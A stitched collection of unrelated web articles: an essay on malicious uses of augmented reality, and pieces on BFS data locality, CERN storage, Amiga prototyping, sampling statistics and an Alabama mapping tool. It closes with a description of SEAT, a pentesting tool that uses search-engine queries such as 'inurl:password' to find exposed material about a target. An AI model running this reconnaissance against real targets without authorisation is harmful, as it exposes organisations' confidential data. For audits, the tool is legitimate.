Most new products begin life with a marketing pitch that extols the product’s virtues. A similarly optimistic property holds in user-centered design, where most books and classes take for granted that interface designers are out to help the user. Users themselves are assumed to be good-natured, upstanding citizens somewhere out of the Leave It to Beaver universe. In reality, however, the opposite is often true. Products have substantial flaws, technology designers seek ways to extract money from users, and many users twist well-intentioned technology in ways the designers never expected, often involving baser instincts. These realities should come as no surprise to security professionals, who are usually most effective when assuming the worst in people.

One emerging technology that is sure to be abused is augmented reality. Augmented reality technologies overlay computer-generated data on a live view of the real world. Anticipated application domains include entertainment, travel, education, collaboration, and law enforcement, among numerous others.

[Video: a pragmatic, and advertisement-laden, view of future augmented reality by YouTube user rebelliouspixels]

Augmented reality bears great promise, as exemplified by Google’s highly optimistic “Project Glass: One day…” video. In the video, a theoretical descendant of Google’s Project Glass helps the user navigate a city, communicate, learn the weather, and otherwise manage his day. A day after Google posted the video, YouTube user rebelliouspixels posted a parody video, “ADmented Reality,” that remixed Google’s Project Glass vision with Google Ads. As we look to the future, this less optimistic view likely will be closer to the mark.

It is important for the security community to start considering unintended, malicious, and evil applications now, before we see widespread adoption of augmented reality technologies. In this article, we combine augmented reality with reasonable assumptions of technological advancement, business incentives, and human nature to present less optimistic, but probable, future augmented reality applications. Admittedly, some are dystopian. We end with suggestions for the security and usability communities to consider now, so that we may be better prepared for our future of augmented reality and the threats and opportunities it presents.

We do not intend to propose science fiction, but instead consider technologies available today or likely to arrive in the next five to ten years. Unless otherwise stated, we assume the capabilities and overall popularity of today’s iPhone/iPad – always-on networking, high-resolution video cameras, microphones, audio, voice recognition, location awareness, the ability to run third-party applications, and processing support from back-end cloud services – but resident in a lightweight set of eyewear with an integrated heads-up display.

Learning from the past

As we consider potential misuse and risks associated with augmented reality, we can learn a great deal from past desktop applications and current iPhone and Android apps to gain insight into both human nature and technical possibilities. From this analysis we identify at least three primary threat categories. The first category is the simplest: current applications that are easily ported to future systems, with little to no augmentation. The next category includes hybrid threats that are likely to evolve due to enhanced capabilities provided by augmented reality.
The final category, and the hardest to predict, are entirely new applications which have little similarity to current applications. These threats will lean heavily on new capabilities and have the potential to revolutionize misuse. In particular, these applications will spring from widespread use, always on sensing, high speed network connectivity to cloud based data sources, and, perhaps most importantly, the integration of an ever present heads-up display, that current cell phones and tablets lack. Regardless from which category new threats emerge, we assume that human nature and its puerile and baser aspects will remain constant, acting as a driving force for the inception of numerous malicious or inappropriate applications. This section lists potential misuse applications for augmented reality. Of course, we do not mean to imply that Google or any other company would endorse or support these applications, but such applications will likely be in our augmented future nonetheless. Persistent cyber bullying In the world defined by Google Glasses users are given unparalleled customizability of digital information overlaid on top of the physical environment. Through these glasses this information gains an anchor into the physical space and allows associations that other individuals can also view, share, vote on, and interact with just as they would via comments on YouTube, Facebook, or restaurant review sites. Persistent virtual tagging opens up the possibility of graffiti or digital art overlaid upon physical objects, but only seen through the glasses. However, hateful or hurtful information could just as easily be shared among groups (imagine what the local fraternity could come up with) or widely published to greater audiences just as it can today, but gains an increasing degree of severity when labeling becomes a persistent part of physical interactions. Imagine comments like “Probably on her period” or “Her husband is cheating” being part of what appears above your head or in a friend’s glasses, without your knowledge. Such abuse isn’t limited to adult users. The propensity for middle and high school age youth to play games that embarrass others is something to be expected. The bright future predicted by Google may be tainted by virtual “kick me” signs on the backs of others which float behind them in the digital realm. Lie detection and assisted lying Augmented reality glasses likely will include lie detection applications that monitor people and look for common signs of deception. According to research by Frank Enos of Columbia University, the average person performs worse than chance at detecting lies based on speech patterns and automated systems perform better than chance. Augmented reality can exploit this. The glasses could conduct voice stress analysis and detect micro-expressions in the target’s face such as eye dilation or blushing. Micro-expressions are very fleeting, occurring in 1/15 of a second, beyond the capabilities of human perception. However, augmented reality systems could detect these fleeting expressions and help determine those attempting to hide the truth. An implication is that people who use this application will become aware of most lies told to them. It could also provide a market for applications that help a person lie. Gamblers, students, and everyday people will likely use augmented reality to gain an unfair advantage in games of chance or tests of skill. 
Gamblers could have augmented reality applications that will count cards, assist in following the “money card” in Three Card Monte, or provide real-time odds assessments. Students could use future cheating applications to look at exam questions and immediately see the answers. Future augmented reality applications will likely assist cheating. In this notional example the student sees the answers by simply looking at the test. Theft and other related crimes may also be facilitated by augmented reality. For example, persistent tagging and change detection could be used to identify homes where the occupants are away on vacation. We anticipate augmented reality will perform at levels above human perception. Applications could notice unlocked cars or windows and alert the potential criminal. When faced with a new type of security system, the application could suggest techniques to bypass the device, a perverted twist on workplace training. The Google Glass video depicted the user calling up a map to find a desired section of a book store. We anticipate similar applications that might provide escape routes and locations of surveillance cameras. Law enforcement detection We also anticipate other applications to support law breaking activities. Today’s radar and laser detectors may feed data into drivers’ glasses as well as collaboratively generated data provided by other drivers about locations of traffic cameras and speed traps. Newer sensors, such as thermal imaging, may allow drivers to see police cars hidden in the bushes a mile down the road. License plate readers and other machine vision approaches will help unmask undercover police cars. Counter law enforcement applications will certainly move beyond just driving applications and may assist in recognizing undercover or off duty police officers, or even people in witness protection programs. Front and rear looking cameras would allow users to see behind them and collaborative or illicit sharing of video feeds would allow users to see around corners and behind walls. Average citizens may use their glasses to record encounters with police, both good and bad. Law enforcement variants of augmented reality may dramatically change the interaction between police officers and citizens. The civil liberties we enjoy today, such as freedom of speech and protection against self-incrimination, will certainly be affected by impending augmented reality technology. What might be relatively private today (such as our identity, current location, or recent activity) will be much more difficult to keep private in a world filled with devices like Google Glasses. A key enabler of future augmented reality systems is facial recognition. Currently, facial recognition technology is in a developmental stage, and only established at national borders or other areas of high security. Ralph Gross, a researcher at the Carnegie Mellon Robotics Institute, claims that current facial recognition technology is becoming more capable of recognizing frontal faces, but struggles with profile recognition. Current technology also has problems recognizing faces in poor lighting and low resolution. We anticipate significant advances during the next decade. Law enforcement agencies, like the police department in Tampa, Florida, have tested facial recognition monitors in areas with higher crime rates, with limited success. The primary cause behind these failures has been the inability to capture a frontal, well lit, high resolution image of the subject. 
This obstacle blocking effective facial recognition would be quickly removed in a world where augmented reality glasses are common and facial images are constantly being captured in everyday interactions. While facial recognition via augmented reality (through glasses or mobile devices) might seem harmless at first glance, a deeper look into this new technology reveals important unintended consequences. For example, a new form of profiling may emerge as a police officer wearing augmented reality glasses might recognize individuals with prior criminal records for which the subjects have already served their time. Without augmented reality, that police officer would have likely never recognized the offenders or known of their crimes. Of course augmented reality may be very beneficial to law enforcement activities, but raises serious questions about due process, civil liberties, and privacy. The end result may be a chilling effect on the population as a whole, both guilty and innocent. Dating and stalking Augmented reality opens the flood gates to applications for dating and stalking. Having a set of eyeglasses that records and posts your location on social networks means that everybody you know can see where you are. For example, a man sits down at a bar and looks at another women through his glasses, and her Facebook or Google+ page pops up on his screen (since she did not know to limit her privacy settings). While augmented reality brings vastly new and exciting opportunities, the technology threatens to eliminate the classic way of meeting and getting to know people: by actually spending time with them. Consider an application that already exists: “Girls Around Me,” -it uses data from social networking sites to display locations of nearby girls on a map. According to Nick Bilton of The New York Times, this application “definitely wins the prize for too creepy.” The evolution of such applications combined with augmented reality opens up numerous other possibilities. Perhaps the glasses will suggest pick-up lines based on a target’s interests, guess people’s ages, highlight single women (or married women), make people more attractive (virtual “beer goggles”), or provide “ratings” based on other users’ feedback. Lie detection applications will likely be in frequent use, and misuse. Expect continuous innovation in this domain. We anticipate that augmented reality will be used to emulate or enhance drug use. History has taught us recreational drugs will always be in demand as will be additional means of enhancement. Some may recall the combination of drugs with Pink Floyd laser light shows. Others may have experimented with Maker SHED’s Trip Glasses which suggests users “Enjoy the hallucinations as you drift into deep meditation, ponder your inner world, and then come out after the 14-minute program feeling fabulous” or the audio approaches suggested by Brad Smith’s DEFCON 18 “Weaponizing Lady GaGa” talk. Augmented reality will open up significant and sought after possibilities. Let’s face it, porn is a driving force behind Internet and technological growth, and we believe the same will hold true for augmented reality. Augmented reality will facilitate sexual activities in untold ways including virtual sexual liaisons, both physical and virtual, local and at a distance. Advanced sensors may allow penetration of clothing or the overlay of exceptionally endowed features on individuals in the real world, perhaps without their knowledge. 
The advice frequently given in public speaking classes, “Imagine the audience naked,” takes on entirely new meaning in this era. There are more than 300 million people in the United States alone and more than that number of mobile phones. Imagine if even one third of this group actively wore and used augmented reality glasses. That would mean 100 million always-on cameras and microphones wielded by adults, teenagers, and children continually feeding data to cloud-based processors. Virtually no aspect of day-to-day life will be exempt from the all seeing eye of ubiquitous and crowdsourced surveillance. Businesses will be incentivized to collect, retain, and mine these data flows to support business objectives, such as targeted advertising, and governments will covet and seek access to this data for security and law enforcement aims. The implications of the privacy of the individual citizen and the chilling effect on society as a whole could be profound. People have long been concerned about the danger of billboards when driving, because they take drivers’ eyes off the road. Text messaging while driving is widely illegal because of the distraction it causes. Now consider augmented reality glasses with pop-up messages that appear while a person drives, walks across a busy intersection, or performs some other activity requiring their full attention. For anybody wearing the glasses, text messaging or advertising alerts and similar interruptions would be very distracting and dangerous. You’ve likely seen, on many occasions, drivers attempting to use their cell phones and their resultant erratic driving. Augmented reality devices encourage such “multitasking” behavior at inappropriate times. The results will not be pretty. People today do stupid things (see the movie Jackass for textbook examples), and in the future, people will continue to do stupid things while wearing augmented reality glasses. One commenter on Google’s YouTube video, PriorityOfVengence1, suggested that someone might even commit suicide wearing Google Glasses. The context of this comment refers to the end of the video when the main character is on a roof video chatting with his girlfriend and says “Wanna see something cool?” PriorityOfVengence1’s comment received over sixty thumbs up in just three days. While some might laugh at the comment, it highlights a disturbing potential reality. What if people spiraling into depression began streaming their suicide attempts by way of their glasses? It is certainly possible — this and many other variations of augmented reality voyeurism should be anticipated. The focus of this article is on user applications that behave in accordance with the user’s wishes. However, if we expand our assumptions to allow for malicious software, options become even more interesting. With malicious software on the augmented reality device, we lose all trust in the “reality” that it presents. The possibilities are legion, so we will only suggest a few. The glasses could appear to be off, but are actually sharing a live video and audio feed. An oncoming car could be made to disappear while the user is crossing the street. False data could be projected over users’ heads, such as a spoofed facial recognition match from a sexual offender registry. For related malware research on today’s mobile technology see Percoco and Papathanasiou’s “This is not the droid you’re looking for…” from DEFCON 18 to begin envisioning additional possibilities. 
The era of ubiquitous augmented reality is rapidly approaching and with it amazing potential and unprecedented risk. The baser side of human nature is unlikely to change nor the profit oriented incentives of industry. Expect the wondrous, the compelling, and the creepy. We will see all three. However, we shouldn’t have to abdicate our citizenship in the 21st Century and live in a cabin in Montana to avoid the risks augmented reality poses. As security professionals we must go into this era with eyes wide open, take the time to understand the technology our tribe is building, and start considering the implications to our personal and professional lives before augmented reality is fully upon us. To live in the 21st Century today online access, social networking presence, and instant connectivity are near necessities. The time may come when always on augmented reality systems such as Google Glasses are a necessity to function in society; before that time however we must get ahead of the coming problems. The first few kids who walk into their SAT exams wearing augmented reality glasses and literally see the answers are going to open Pandora’s Box.
https://www.helpnetsecurity.com/2013/02/12/65279unintended-malicious-and-evil-applications-of-augmented-reality/
Data locality plays a critical role in energy efficiency and performance in parallel programs. For data-parallel algorithms where locality is abundant, it is a relatively straightforward task to map and optimize for architectures with user-programmable local caches. However, for irregular algorithms such as Breadth-First Search (BFS), exploiting locality is a non-trivial task. Guang Gao, a professor in the Department of Electrical and Computer Engineering at the University of Delaware, works on mapping and exploiting locality in irregular algorithms such as BFS. Gao notes, "there are only a few studies of the energy efficiency issue of the BFS problem, … and more work is needed to analyze energy efficiency of BFS on architectures with local storage."

In BFS, data locality is exploited in one of two ways: intra-loop and inter-loop locality. Intra-loop locality refers to reuse within a single loop body, between adjacent iterations; inter-loop locality refers to reuse between iterations belonging to different loops. Exploiting both intra- and inter-loop locality is relatively simple provided the programmer leverages a model that supports fine-grain parallelism; typical approaches to irregular algorithms do not perform well under traditional coarse-grain execution models like OpenMP.

Using BFS as their motivating example, Gao's team exploits data locality using Codelet, a fine-grain data-flow execution model. In the Codelet model, units of computation are called codelets. Each codelet is a sequential piece of code that can be executed without interruption (no synchronization is required mid-execution). Data dependences between codelets are specified through a directed graph called the codelet graph. At execution time, the runtime schedules codelets as their dependencies are satisfied.

The Codelet model executes in the context of an abstract parallel machine model. The machine consists of many computing nodes stitched together via an interconnection network. Each node contains a many-core chip organized into two types of cores, CUs and SUs, whose heterogeneity provides differing performance and energy profiles. Codelets that can benefit from a weaker core can be scheduled onto one type of core to save energy; conversely, a codelet that requires heavy-duty computation can be scheduled onto a stronger core. By leveraging fine-grain data-flow execution models such as Codelet, Gao and his team are able to reduce the dynamic energy of memory accesses by up to 7% compared to the traditional coarse-grain OpenMP model.
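To make the fine-grain decomposition concrete, here is a minimal Python sketch of a level-synchronous BFS whose frontier expansion is split into small codelet-like tasks. It is only an illustration of the idea, not the Codelet runtime or its scheduler; the chunk size, thread pool, and function names are assumptions made for the example.

```python
from collections import defaultdict
from concurrent.futures import ThreadPoolExecutor

def codelet_expand(graph, frontier_slice, visited):
    """One codelet-like task: expand a contiguous slice of the current frontier.

    Keeping the slice small and contiguous is where intra-loop locality would come
    from; reusing the same slicing across BFS levels is one way to aim for
    inter-loop locality.
    """
    discovered = []
    for u in frontier_slice:
        for v in graph[u]:
            if v not in visited:      # benign race: duplicates are filtered by the caller
                discovered.append(v)
    return discovered

def bfs(graph, source, chunk=1024, workers=4):
    visited = {source}
    frontier = [source]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        while frontier:
            slices = [frontier[i:i + chunk] for i in range(0, len(frontier), chunk)]
            next_frontier = []
            for result in pool.map(lambda s: codelet_expand(graph, s, visited), slices):
                for v in result:
                    if v not in visited:
                        visited.add(v)
                        next_frontier.append(v)
            frontier = next_frontier
    return visited

if __name__ == "__main__":
    g = defaultdict(list)
    for a, b in [(0, 1), (0, 2), (1, 3), (2, 3), (3, 4)]:
        g[a].append(b)
        g[b].append(a)
    print(len(bfs(g, 0)))   # 5 reachable vertices
```

A real codelet runtime would go further, pinning each task onto a core close to the slice of data it touches and choosing a weak or strong core per task; the sketch only shows the decomposition into small, independently schedulable units.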
https://www.hpcwire.com/2014/02/18/data-locality-cure-irregular-applications/
Since restarting in June after a two-year upgrade, CERN's Large Hadron Collider (LHC) has been recording about 3GB of data per second, or about 25 petabytes -- that's 25 million gigabytes -- of data per year.

Every time the LHC smashes particles together at near the speed of light in its 16-mile-long chamber, the shattered particles fly off in a myriad of directions. Those particles leave behind traces in space, like footsteps in snow, which are recorded and later analyzed in a search for the most basic element of matter. But unlike a camera, which absorbs light in order to produce a photo, the traces that result from particle collisions pass through the LHC's "detectors," leaving many points of interaction in their path. Every point represents an action at a point in time that can help pinpoint the particle's characteristics. The detectors that record particle collisions have 100 million read-out channels and take 14 million pictures per second. It's akin to saving 14 million selfies with every tick of a watch's second hand.

Needles and haystacks

Guenther Dissertori, a professor of particle physics at CERN and the Swiss Federal Institute of Technology in Zurich, said the task of finding matter's most basic particle is vastly more difficult than finding that proverbial needle in a haystack. "The search for the particle is more than a search for a needle in a haystack. We get 14 million haystacks per second - and unfortunately the needle also looks like hay," Dissertori said. "The amount of data produced at CERN was impressive 10 years ago, but is not as impressive as what's produced today."

Dissertori said CERN's public-private partnerships could solve the expected technological hurdles, including the need for new storage technologies that can save exabytes of data in the future. Unlike Google or Amazon, two Internet companies that spend billions of dollars every year to develop new technology, CERN has limited money; it's funded by 21 member states and has an annual budget of around $1.2 billion. "We have to be very creative to find solutions," Dissertori said. "We're forced to find the best possible ways to collaborate with [the IT] industry and get the most out of it."

Almost since its founding, CERN has been developing ways to improve data storage, cloud technologies, data analytics and data security in support of its research. Its technological advancements have resulted in a number of successful research spin-offs from its primary particle work, including the World Wide Web, hypertext language for linking online documents and grid computing. Its invention of grid computing technology, known as the Worldwide LHC Computing Grid, has allowed it to distribute data to 170 data centers in 42 countries in order to serve more than 10,000 researchers connected to CERN.

Storing data, sharing data

During the LHC's development phase 15 years ago, CERN knew that the storage technology required to handle the petabytes of data it would create didn't exist. And researchers couldn't keep storing data within the walls of their Geneva laboratories, which already house an impressive 160PB of data. CERN also needed to share its massive data in a distributed fashion, both for speed of access as well as the lack of onsite storage. As it has in the past, CERN developed the storage and networking technology itself, launching the OpenLab in 2001 to do just that.
OpenLab is an open source, public-private partnership between CERN and leading educational institutions and information and communication technology companies, such as Hewlett-Packard. A growing grid In all, the LHC Computing Grid has 132,992 physical CPUs, 553,611 logical CPUs, 300PB of online disk storage and 230PB of nearline (magnetic tape) storage. It's a staggering amount of processing capacity and data storage that relies on having no single point of failure. In the next 10 to 20 years, data will grow immensely because the intensity of accelerator will be ramped up, according to Dissertori. "The electronics will be improved so we can write out more data packages per second than we do now," Dissertori said. Every LHC experiment at the moment writes data on a magnetic tape at the order of 500 data packets per second; each packet is a few megabytes in size. But CERN is striving to keep as much data as possible on disc, or online storage, so that researchers have instant access to it for their own experiments. "One interesting development is to see how can we implement it with data analysis within our cloud computing paradigm. For now, tests are ongoing on our cloud," Dissertori said. "I could very well imagine in near term future more things done in that direction." This story, "CERN's data stores soar to 530M gigabytes" was originally published by Computerworld.
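As a rough cross-check of the figures quoted above, the arithmetic can be written out in a few lines. This is only a back-of-the-envelope sketch based on the numbers in the article; the "days of data taking" it derives is an inference from those numbers, not a figure stated by CERN.

```python
GB, PB = 1e9, 1e15

record_rate = 3 * GB        # bytes recorded per second while the LHC is running
yearly_volume = 25 * PB     # quoted volume recorded per year

# 25 PB at 3 GB/s works out to roughly 8.3 million seconds,
# i.e. on the order of 100 days of actual data taking per year.
days_recording = yearly_volume / record_rate / 86400
print(f"~{days_recording:.0f} days of recording at 3 GB/s")    # ~96

# Worldwide LHC Computing Grid capacity quoted in the article
disk_pb, tape_pb = 300, 230
print(f"Grid storage: {disk_pb + tape_pb} PB across 170 data centres in 42 countries")
```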
http://www.itnews.com/article/2960642/cloud-storage/cerns-data-stores-soar-to-530m-gigabytes.html
Prototyping the hardware Modern chips are designed using high-powered workstations that run very expensive chip simulation software. However, the fledgling Amiga company could not afford such luxuries. It would instead build, by hand, giant replicas of the silicon circuitry on honeycomb-like plastic sheets known as breadboards. Breadboards are still used by hobbyists today to rapidly build and test simple circuits. The way they work is fairly simple. The breadboard consists of a grid of tiny metal sockets arranged in a large plastic mesh. Short vertical strips of these sockets are connected together on the underside of the board so that they can serve as junctions for multiple connectors. Small lengths of wire are cut precisely to length and bent into a staple-like shape, with the exposed wire ends just long enough to drop neatly into the socket. Small chips that perform simple logic functions (such as adding or comparing two small numbers in binary code) straddle the junctions, their centipede-like rows of metal pins precisely matching the spacing of the grid. The Lorraine prototype, with three custom "chips." Image courtesy of Secret Weapons of Commodore At the time, nobody had ever designed a personal computer this way. Most personal computers, such as the IBM PC and the Apple ][, had no custom chips inside them. All they consisted of was a simple motherboard that defined the connections between the CPU, the memory chips, the input/output bus, and the display. Such motherboards could be designed on paper and printed directly to a circuit board, ready to be filled with off-the-shelf chips. Some, like the prototypes for the Apple ][, were designed by a single person (in this case, Steve Wozniak) and manufactured by hand. The Amiga was nothing like this. Its closest comparison would be to the minicomputers of the day—giant, refrigerator-sized machines like the DEC PDP-11 and VAX or the Data General Eagle. These machines were designed and prototyped on giant breadboards by a team of skilled engineers. Each one was different and had to be designed from scratch—although to be fair, the minicomputer engineers had to design the CPU as well, a considerable effort all by itself! These minicomputers sold for hundreds of thousands of dollars each, which paid for the salaries of all the engineers required to construct them. The Amiga team had to do the same thing, but for a computer that would ultimately be sold for under $2,000. So there were three chips, and each chip took eight breadboards to simulate, about three feet by one and a half feet in size, arranged in a circular, spindle-like fashion so that all the ground wires could run down the center. Each board was populated with about 300 MSI logic chips, giving the entire unit about 7200 chips and an ungodly number of wires connecting them all. Constructing and debugging this maze of wires and chips was a painstaking and often stressful task. Wires could wiggle and lose their connections. A slip of a screwdriver could pull out dozens of wires, losing days of work. Or worse, a snippet of cut wire could fall inside the maze, causing random and inexplicable errors. However, Jay never let the mounting stress get to him or to his coworkers. The Amiga offices were a relaxed and casual place to work. As long as the work got done, Jay and Dave Morse didn't care how people dressed or how they behaved on the job. Jay was allowed to bring his beloved dog, Mitchy, into work. He let him sit by his desk and had a separate nameplate manufactured for him. 
Jay even let Mitchy help in the design process. Sometimes, when designing a complex logic circuit, one comes to a choice of layout that could go either way. The choice may be an aesthetic one, or merely an intuitive guess, but one can't help but feel that it should not be left merely to random chance. On these occasions Jay would look at Mitchy, and his reaction would determine the choice Jay would make. Slowly, the Amiga's custom chips began to take shape. Connected to a Motorola 68000 CPU, they could accurately simulate the workings of the final Amiga, albeit more slowly than the final product would run. But a computer, no matter how advanced, is nothing more than a big, dumb pile of chips without software to run on it.
https://arstechnica.com/gadgets/2007/08/a-history-of-the-amiga-part-3/
In Part I, we provided an overview of the metrics arms race and walked through the use of sampling in this regard. We also discussed the importance of baking recency of data into sampling, and some of the pitfalls of sampling such as sampling error. Recall that exact measurement of sampling error is not feasible, as the true population values are generally unknown; hence, sampling error is often estimated by probabilistic modeling of the sample.

Random sampling error is often measured using the margin of error statistic. The statistic denotes a likelihood that the result from a sample is close to the number one would get if the whole population had been used. When a single, global margin of error is reported, it refers to the maximum margin of error using the full sample. Margin of error is defined for any desired confidence level; typically, a confidence of 95% is chosen. For a simple random sample from a large population, the maximum margin of error at confidence level C is

E_m = \frac{\operatorname{erf}^{-1}(C)}{\sqrt{2n}} = \frac{z_C}{2\sqrt{n}}

where \operatorname{erf}^{-1} is the inverse error function, z_C is the corresponding normal quantile (approximately 1.96 at 95% confidence), and n is the sample size. In accord with intuition, the maximum margin of error decreases with a larger sample size. It should be noted that the margin of error only accounts for random sampling error and is blind to systematic errors.

An underlying assumption of the formula above is that the population is infinitely large; hence, the margin of error does not depend on the size of the population (N) of interest. Given the real-time, large volume of operational data, the assumption can be taken to hold for practical purposes. Having said that, the assumption is valid only when the sampling fraction is small (typically less than 5%). On the other hand, if no restrictions are made – such as that n/N should be small, or N large, or that the population is normal – then, as per Isserlis, the margin of error should be corrected with the finite population correction:

E'_m = E_m \sqrt{\frac{N-n}{N-1}}

It is important to validate the underlying assumptions, as sampling error has direct implications for analyses such as anomaly detection (refer to Part I).
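A short numerical sketch of the two formulas above, assuming the standard large-population form of the maximum margin of error and the usual finite-population correction; the helper functions and sample sizes are illustrative, not from the original post.

```python
import math
from statistics import NormalDist

def max_margin_of_error(n, confidence=0.95):
    # Worst case p = 0.5, so E_m = z / (2 * sqrt(n)),
    # where z = sqrt(2) * erfinv(confidence) is the normal quantile (~1.96 at 95%).
    z = NormalDist().inv_cdf(0.5 + confidence / 2)
    return z / (2 * math.sqrt(n))

def corrected_margin_of_error(n, N, confidence=0.95):
    # Finite population correction for a non-negligible sampling fraction n/N.
    fpc = math.sqrt((N - n) / (N - 1))
    return max_margin_of_error(n, confidence) * fpc

print(round(max_margin_of_error(1000), 4))               # ~0.031, the familiar +/-3 points
print(round(corrected_margin_of_error(1000, 5000), 4))   # noticeably smaller once n/N = 20%
```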
The following sampling methodologies have been extensively studied and used in a variety of contexts: simple random sampling, stratified random sampling, systematic sampling, and adaptive sampling.

In stratified random sampling, the population is divided into non-overlapping strata and a random sample is drawn from each stratum, where:
- N = population size
- L = # strata
- Nh = size of stratum h
- nh = size of the random sample drawn from stratum h
- sh = sample standard deviation of stratum h
- mh = sample mean of stratum h

The stratified estimate of the population mean is \sum_h (N_h/N)\,m_h, with estimated variance \sum_h (N_h/N)^2\, s_h^2/n_h. Stratification often improves the representativeness of the sample by reducing sampling error. On comparing the relative precision of simple random and stratified random sampling, Cochran remarked the following:

“… stratification nearly always results in smaller variance for the estimated mean or total than is given by a comparable simple random sample. … If the values of nh are far from optimum, stratified sampling may have a higher variance.”

where nh is the size of a random sample from a stratum. In the context of operations, if one were to evaluate the Response Time of a website, the response time data should be divided into multiple strata based on geolocation and then analyzed.

In systematic sampling, units are drawn at a fixed interval k after a random start. A variant sets the start of the sampling sequence to (k+1)/2 if k is odd or to k/2 if k is even. In another variation, the N units are assumed to be arranged around a circle, a number between 1 and N is selected at random, and then every k-th unit (where k = the integer nearest to N/n) is sampled. The reader is referred to the literature for further reading on systematic sampling.

Several variants of adaptive sampling have been proposed in the literature. For instance, in Locally Adaptive Sampling, the intervals between samples are computed using a function of previously taken samples, called a sampling function. Hence, though it is a non-uniform sampling scheme, one need not keep the sampling times. In particular, sampling time t_{i+1} is determined from the current sampling time and the sampling function f applied to the most recent samples: t_{i+1} = t_i + f(x_{t_i}, x_{t_{i-1}}, …).

We now walk through a couple of examples to illustrate the applicability of the sampling techniques discussed above. The first example compares # Page Views across the different continents over a three-day period; the data was collected every hour and plotted on a logarithmic y-axis. Simple random or stratified random sampling of such a time series would render the subsequent comparison inaccurate owing to the underlying seasonality. This can be addressed by employing systematic sampling, whereby the # page views of the same hour for each day would be sampled. Subsequent comparison of the sampled data across different continents would then be valid.

The second example compares Document Completion time across the different continents over a three-day period, again collected every hour (with the y-axis in thousands of milliseconds). Unlike # Page Views, Document Completion time does not exhibit a seasonal nature. Given its high variance, employing simple random sampling would incur a large sampling error. Consequently, in this case stratified random sampling – where a stratum would correspond to a day – can be employed, and the sampled data can then be used for comparative analysis across the different continents (a small synthetic illustration of this follows the readings below).

Readings: “Sampling Techniques”, W. G. Cochran; “Adaptive Sampling”, Steven K. Thompson and George A. F. Seber.

By: Arun Kejariwal, Ryan Pellette, and Mehdi Daoudi
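To make Cochran's remark and the Document Completion example concrete, here is the small synthetic sketch referenced above. It compares the spread of the simple random and stratified estimators over repeated draws; all data, sample sizes, and names are invented for illustration and are not from the original post.

```python
import random
import statistics

random.seed(7)

# Synthetic "document completion times" (ms): three days with very different means,
# mimicking a high-variance metric with day-to-day drift.
strata = [
    [random.gauss(2000, 150) for _ in range(2400)],   # day 1
    [random.gauss(3500, 150) for _ in range(2400)],   # day 2
    [random.gauss(5000, 150) for _ in range(2400)],   # day 3
]
population = [x for stratum in strata for x in stratum]
true_mean = statistics.fmean(population)

def srs_estimate(n):
    # Simple random sample of size n from the pooled population.
    return statistics.fmean(random.sample(population, n))

def stratified_estimate(n_per_stratum):
    # Equal-sized strata, so proportional allocation means equal samples per stratum.
    return statistics.fmean(
        x for s in strata for x in random.sample(s, n_per_stratum)
    )

srs_errors = [srs_estimate(90) - true_mean for _ in range(500)]
strat_errors = [stratified_estimate(30) - true_mean for _ in range(500)]
print(f"simple random  std. error ~ {statistics.pstdev(srs_errors):.0f} ms")
print(f"stratified     std. error ~ {statistics.pstdev(strat_errors):.0f} ms")
# Stratifying by day removes the between-day variance, echoing Cochran's remark.
```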
http://blog.catchpoint.com/2016/11/04/sampling-types-example-use-cases/
Alabama Gov. Bob Riley last week unveiled Virtual Alabama, a comprehensive database of satellite imagery and aerial photography designed to assemble, display, evaluate and share critical data for emergency responders. Riley was joined by Google Earth Chief Technology Officer Michael T. Jones and Alabama Homeland Security Director Jim Walker to demonstrate the uses and capabilities of the new tool for state officials.

At Riley's direction, the Alabama Department of Homeland Security and Google Earth have been working to create a visualization tool that provides a common operational picture across the state that first responders, county planners and other officials can use to get detailed geographic views overlaid with pertinent information. Equipped with the Google Earth platform, the state's Department of Homeland Security can model hazardous explosions with plume threat measurements and build three-dimensional models of schools, bridges and other critical structures. Virtual Alabama can overlay those models and satellite/aerial imagery with the locations of fire hydrants, gas pipelines, hazardous chemical data, and other important information that can help emergency personnel.

With such data, Homeland Security officials can plan more effective disaster response scenarios and prepare emergency teams to be better equipped to respond to crises. For example, this information can be shared with local firefighters before they enter a burning building.
http://www.govtech.com/geospatial/Governor-Riley-Unveils-Virtual-Alabama-to.html?topic=117676
SEAT – Search Engine Assessment Tool – is a tool dedicated to security professionals and pentesters. Using popular search engines, it searches for interesting information stored in their caches. It also uses other types of public resources (see later).

Popular search engines like Google or Yahoo! (non-exhaustive list) use crawlers (or robots) to surf the Internet, visit found websites, index the retrieved content and store it in databases. [Note: A small tool to check when the Google bot last visited your site: gbotvisit.com]

What's the concern with security? Web robots index everything (in reality, some filters may be defined via robots.txt files, but it's not the scope of this post). Let's assume that everything is cached. It means that unexpected content can be crawled by robots and made publicly available:
- temporary pages
- unprotected confidential material
- sites under construction

When you search something via Google, you just type a few words and expect some useful content to be retrieved. But the search engines are able to process much more complex queries! Examples (for Google):
- "site:rootshell.be foo" will search for the string "foo" only in hosts *.rootshell.be.
- "inurl:password" will search for the string "password" in the URL only.
- "ext:pdf exploit" will search for the string "exploit" in PDF documents.

Here comes the power of SEAT! It will build complex queries against not only Google but other well-known search engines. It comes with a pre-installed list of the most common sites, but you're free to add your own. Pre-configured search engines are: Google, Yahoo, Live, AOL, AllTheWeb, AltaVista and DMOZ. Once the queries are performed (it may take quite some time if you configured multiple searches), it displays the results in a convenient way.

The usage of SEAT is based on a three-phase process (the three tabs on top of the window):
- Preparation: You define here your target (a host, a domain name or IP addresses), and which type(s) of query you will perform.
- Execution: You select here the search engine(s) you would like to use and how to query them (number of threads, sleep times, …). Then you start/pause/stop the query. Queries are multi-threaded and may have a side effect: your IP can be blacklisted (Google has a powerful algorithm to prevent usage of tools like SEAT). Take care if you use it from your corporate LAN: your whole company could be temporarily blacklisted by Google!
- Analysis: The last step is the analysis of the retrieved content. Once the analysis is performed (and it can take quite some time depending on your targets/queries), results are available. For each result, extra operations can be performed (by double-clicking the URL):
- Direct request (Warning: this can reveal your IP address to the target)
- Grab data from the Netcraft database
- Grab a copy from archive.org
- Grab a copy from the Google cache

SEAT is fully customizable: your own search engines and advanced queries can be added. Execution can be tuned (number of concurrent threads, User-Agent, sleep time between queries, etc.) and, of course, results can be saved (export to .txt or .html files).

Search engine databases are full of interesting information! As repeated during the last ISSA meeting this week, if you search for information about a target, just ask! SEAT is a perfect tool to conduct an audit or pentest. A few words about the supported environment: SEAT is written in Perl (version 5.8.0-RC3 and higher) and requires the following modules: Gtk2, threads, threads::shared, XML::Smart.
